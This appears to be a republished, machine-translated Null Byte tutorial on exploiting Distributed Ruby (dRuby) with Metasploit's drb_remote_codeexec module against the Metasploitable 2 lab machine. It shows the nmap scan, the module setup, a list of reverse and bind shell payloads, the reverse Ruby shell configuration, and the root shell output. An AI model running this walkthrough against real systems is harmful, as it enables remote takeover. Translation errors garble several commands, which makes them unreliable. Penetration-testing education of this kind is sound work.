قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack Distributed Ruby with Metasploit and Run Code Execution «Null Byte :: WonderHowTo

How to Hack Distributed Ruby with Metasploit and Run Code Execution «Null Byte :: WonderHowTo



Things that should make life easier for developers and users are often an easy target for hackers. As in many situations in the tech world, there is usually a trade-off between comfort and safety. Such a compromise can be found in a system called Distributed Ruby, which can easily be compromised with Metasploit.

Distributed Ruby Overview

Distributed Ruby, also known as dRuby or DRb, is a distributed object system for Ruby's Programming Language that allows remote method calls between Ruby processes, even on different machines. It uses its own protocol and is written entirely in pure Ruby.

This is a flexible service that allows developers to improve certain programs, but it also leads to security bugs if not properly implemented, such as in older versions of dRuby. Since this is usually used for smaller projects and inexperienced programs, there are usually no security concerns.

The Metasploit module we will use will automatically try to exploit the vulnerable instance_eval and syscall methods and get a shell. We will test this on Metasploitable 2, a deliberately vulnerable virtual machine running an insecure version of dRuby.

Step 1
: Verify the Vulnerability

First, we must confirm that Distributed Ruby (dRuby) is running on our target. When dRuby is initially set up, it binds to a specific URI and port, in this case port 8787. We can run a Nmap scan on that port to make sure that it does.

Use the -sV tag to identify service and version information, followed by the IP address of the destination, and then specify port 8787 with the -p tag Since this port is outside the default Nmap general port list, it will be scanned.

  nmap -sV 172.16.1.102 -p 8787

[*] exec: nmap -sV 172.16.1.102 -p 8787

Starting Nmap 7.70 (https://nmap.org) at 2019-01-15 10:07 CST
Nmap scan report for 172.16.1.102
Host is active (0.0013s latency).

PORT STATE SERVICE VERSION
8787 / tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 08: 00: 27: 77: 62: 6C (Virtual Oracle VirtualBox NIC)

Service detection performed. Please report incorrect results at https://nmap.org/submit/.
Nmap finished: 1 IP address (1 host up) scanned in 19.65 seconds 

The dRuby service is in place and in operation. Now we are looking for an exploit to use.

Step 2: Find an Exploit

Start Metasploit with msfconsole and enter search drb to display all matching results.

  msf> search drb

Matching modules
==================

Date of disclosure of the name rank verification of the description
---- --------------- ---- ----- -----------
exploit / linux / misc / drb_remote_codeexec 2011-03-23 ​​excellent No distributed Ruby remote code execution
Exploit / multi / misc / wireshark_lwres_getaddrbyname 2010-01-27 Excellent No Wireshark LWRES Dissector getaddrsbyname_request Buffer overflow
Exploit / multi / misc / wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) 

It looks like drb_remote_codeexec is exactly what we need. Load the exploit with the command use and the path of the module.

  msf> use exploit / linux / misc / drb_remote_codeexec 

Now we can find information in this module with the command info .

  msf exploit (linux / misc / drb_remote_codeexec)> info

Name: Distributed Ruby Remote Code Execution
Module: Exploit / Linux / misc / drb_remote_codeexec
Platform: Unix
Bow: cmd
Privileged: No.
License: Metasploit Framework License (BSD)
Rank: Excellent
Revealed: 2011-03-23

Provided by:
joernchen 

Available goals:
ID name
- ----
0 automatically
1 trap
2 Eval
3 syscalls

Check the supported ones:
No

Basic options:
Name Current setting Required description
---- --------------- -------- -----------
RHOST no The destination address
RPORT 8787 Yes The destination port
URI no The URI of the destination host (druby: // host: port) (overrides RHOST / RPORT)

Payload information:
Room: 32768

Description:
This module has remote code execution vulnerabilities in dRuby.

references:
CVE: Not available
http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
http://bugkraut.de/posts/tainting[19659010TherearealsosomedetailsincludingExploitlikePlatforminformationthebeginningdateofthevulnerabilitydisclosureandavailableoptionsforthisExploit[196659006] Step 3: Launch the Exploit 

Now we can set our options. We can set the IP address of our destination with the command set rhost .

  msf exploit (linux / misc / drb_remote_codeexec)> set rhost 172.16.1.102

rhost => 172.16.1.102 

Next we can show the available payloads for this module with the command show payloads .

  msf exploit (linux / misc / drb_remote_codeexec)> show payloads> view

Compatible payloads
=====================

Date of disclosure of the name rank verification of the description
---- --------------- ---- ----- -----------
cmd / unix / bind_awk normal No Unix command shell, bind TCP (via AWK)
cmd / unix / bind_busybox_telnetd normal No Unix command shell, bind TCP (via BusyBox telnetd)
cmd / unix / bind_lua normal No Unix command shell, bind TCP (via Lua)
cmd / unix / bind_netcat normal No Unix command shell, bind TCP (via netcat)
cmd / unix / bind_netcat_gaping normal No Unix command shell, bind TCP (via netcat -e)
cmd / unix / bind_netcat_gaping_ipv6 normal No Unix command shell, bind TCP (via netcat -e) IPv6
cmd / unix / bind_nodejs normal No Unix command shell, bind TCP (via nodejs)
cmd / unix / bind_perl normal No Unix command shell, bind TCP (via Perl)
cmd / unix / bind_perl_ipv6 normal No Unix command shell, bind TCP (per Perl), IPv6
cmd / unix / bind_r normal No Unix command shell, bind TCP (over R)
cmd / unix / bind_ruby normal No Unix command shell, bind TCP (via Ruby)
cmd / unix / bind_ruby_ipv6 normal No Unix command shell, TCP (over Ruby) bind IPv6
cmd / unix / bind_socat_udp normal No Unix command shell, bind UDP (via socat)
cmd / unix / bind_stub normal No Unix command shell, bind TCP (stub)
cmd / unix / bind_zsh normal No Unix command shell, bind TCP (via Zsh)
cmd / unix / generic normal No Unix command, Generic command execution
cmd / unix / reverse normal No Unix command shell, Double Reverse TCP (Telnet)
cmd / unix / reverse_awk normal No Unix command shell, reverse TCP (via AWK)
cmd / unix / reverse_bash normal No Unix command shell, reverse TCP (/ dev / tcp)
cmd / unix / reverse_bash_telnet_ssl normal No Unix command shell, TCP TCP reverse (Telnet)
cmd / unix / reverse_ksh normal No Unix command shell, reverse TCP (via Ksh)
cmd / unix / reverse_lua normal No Unix command shell, reverse TCP (via Lua)
cmd / unix / reverse_ncat_ssl normal No Unix command shell, reverse TCP (via ncat)
cmd / unix / reverse_netcat normal No Unix command shell, reverse TCP (via netcat)
cmd / unix / reverse_netcat_gaping normal No Unix command shell, reverse TCP (via netcat -e)
cmd / unix / reverse_nodejs normal No Unix command shell, reverse TCP (via nodejs)
cmd / unix / reverse_openssl normal No Unix command shell, Double Reverse TCP SSL (openssl)
cmd / unix / reverse_perl normal No Unix command shell, reverse TCP (via Perl)
cmd / unix / reverse_perl_ssl normal No Unix command shell, reverse TCP SSL (via Perl)
cmd / unix / reverse_php_ssl normal No Unix command shell, reverse TCP ssl (via PHP)
cmd / unix / reverse_python normal No Unix command shell, reverse TCP (via Python)
cmd / unix / reverse_python_ssl normal No Unix command shell, reverse TCP ssl (via Python)
cmd / unix / reverse_r normal No Unix command shell, TCP reverse (above R)
cmd / unix / reverse_ruby normal No Unix command shell, reverse TCP (via Ruby)
cmd / unix / reverse_ruby_ssl normal No Unix command shell, reverse TCP SSL (via Ruby)
cmd / unix / reverse_socat_udp normal No Unix command shell, UDP reverse (via socat)
cmd / unix / reverse_ssl_double_telnet normal No Unix command shell, Double Reverse TCP SSL (Telnet)
cmd / unix / reverse_stub normal No Unix command shell, reverse TCP (stub)
cmd / unix / reverse_zsh normal No Unix command shell, reverse TCP (via Zsh)
generic / custom normal No custom payload
generic / shell_bind_tcp normal No generic command shell, bind TCP inline
generic / shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline 

As you can see, here are some options. At the moment we are using a reverse shell command in Ruby. Use set payload to assign the appropriate payload.

  msf exploit (linux / misc / drb_remote_codeexec)> set the payload cmd / unix / reverse_ruby

payload => cmd / unix / reverse_ruby 

Now we can see the current settings to see where we are at. Use the command with the options .

  msf exploit (linux / misc / drb_remote_codeexec)> options

Module options (Exploit / Linux / misc / drb_remote_codeexec):

Name Current setting Required description
---- --------------- -------- -----------
RHOST 172.16.1.102 no The destination address
RPORT 8787 Yes The destination port
URI no The URI of the destination host (druby: // host: port) (overrides RHOST / RPORT)

Payload options (cmd / unix / reverse_ruby):

Name Current setting Required description
---- --------------- -------- -----------
LHOST yes The listening address (an interface can be specified)
LPORT 4444 yes The listport

Exploit target:

ID name
- ----
0 Automatic 

Since we have set a payload to a reverse shell, we need to specify a listening address to which the shell can call back. This is the IP address of our local computer. Use set lhost to assign this now.

  msf exploit (linux / misc / drb_remote_codeexec)> set lhost 172.16.1.100

lhost => 172.16.1.100 

Step 4: Get a Shell

We should be fine. Type Exploit at the command prompt or run which does exactly the same thing but is shorter. We should start the attack and try a few methods to exploit the target.

  msf exploit (linux / misc / drb_remote_codeexec)> run

[*] The reverse TCP handler was started at 172.16.1.100:4444
[*] Attempt to exploit the instance_eval method
[!] The target is not vulnerable to the instance_eval method
[*] Attempt to exploit the syscall method
[*] Attempt to execute x86 from .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7

who am I
root
uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
IP address
1: lo:  mtu 16436 qdisc noqueue
link / loopback 00: 00: 00: 00: 00: 00 brd 00: 00: 00: 00: 00: 00
inet 127.0.0.1/8 scope lo lo
inet6 :: 1/128 Scope Host
valid_lft forever Preferred_lft forever
2: eth0:  mtu 1500 qdisc pfifo_fast qlen 1000
link / ether 08: 00: 27: 77: 62: 6c brd ff: ff: ff: ff: ff: ff
inet 172.16.1.102/12 brd 172.31.255.255 Scope global eth0
inet6 fe80 :: a00: 27ff: fe77: 626c / 64 area link
valid_lft forever preferred_lft forever 

After successful launch, a flashing cursor should be displayed as a prompt. We can now execute any command we want, such as whoami to indicate the current user, uname -a to display system information, and have the IP address Shell on the target system. Now that we have a root shell, we own the system and can basically do what we want.

Wrapping Up

In this article, we learned how to use a simple service that provides programs with extended functionality with the goal of achieving root access. Because Distributed Ruby was designed for remote communication between processes, vulnerabilities were inadvertently opened. We saw how easily we could find a root-level shell on the target system and once again prove just how powerful Metasploit really is.

Don & # 39; t Miss: The Ultimate Command Cheat Sheet for Metasploits Meterpreter [19659038] Title image by Peter-Lomas / Pixabay; Screenshots of drd_ / zero byte


Source link